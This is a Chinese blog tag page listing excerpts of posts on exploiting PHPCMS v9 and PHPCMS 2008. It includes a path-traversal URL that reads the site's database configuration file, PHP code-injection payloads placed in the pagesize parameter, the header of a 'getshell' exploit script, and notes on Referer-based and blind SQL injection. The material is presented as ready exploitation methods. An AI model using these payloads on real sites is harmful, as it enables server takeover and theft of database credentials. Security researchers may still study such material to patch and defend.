标签 phpcms 下的文章

PHPCMSv9 SQL注入(Rerferer注入)

from:http://huakai.paxmac.org/?p=522360报告了该漏洞,地址:http://webscan.360.cn/news/news84,重要部分被打上了马赛克,根据分析漏洞,给出利用方法。 上面说的很详细了,由于poster_click函数在插入数据库的时候,没对http-referer做过滤,然后产生了注入。 public function poster_c...

没穿底裤 2013 年 01 月 08 日 1 条评论

phpcms V9 getshell exp

#!usr/bin/php -w <?php error_reporting(E_ERROR); set_time_limit(0); $pass="xxx"; print_r(' +---------------------------------------------------------------------------+ PHPCms V9 GETSHELL...

没穿底裤 2012 年 09 月 28 日 暂无评论

phpcms2008包含漏洞的利用

前几天在sebug看到了这个漏洞,http://sebug.net/vuldb/ssvid-60280看了看作者对这个漏洞进行的分析,本人小菜只是略懂代码看了一看进行了测试,是对phpcms2008的利用吧,大牛看了不要喷实例网站:http://www.xxoo.com 为了使网站不至于变成万人日## 注册的时候选择企业用户 if(!$company_user_infos) { ...

没穿底裤 2012 年 07 月 25 日 2 条评论

phpcmsV9最新任意读文件漏洞

from:www.creturn.com powered by phpcms v9 [php] /index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php [/php] 关于拿sh...

没穿底裤 2012 年 07 月 25 日 2 条评论

Phpcms 2008 漏洞整理

盲注flash_upload.php?modelid=1 product.php pagesize参数代码注射漏洞yp/product.php?pagesize=${@print(md5(admin))}yp/product.php?pagesize=${@phpinfo()}  askarch_ajax.php SQL注射漏洞ask/search_ajax.php?q=...

没穿底裤 2012 年 05 月 18 日 暂无评论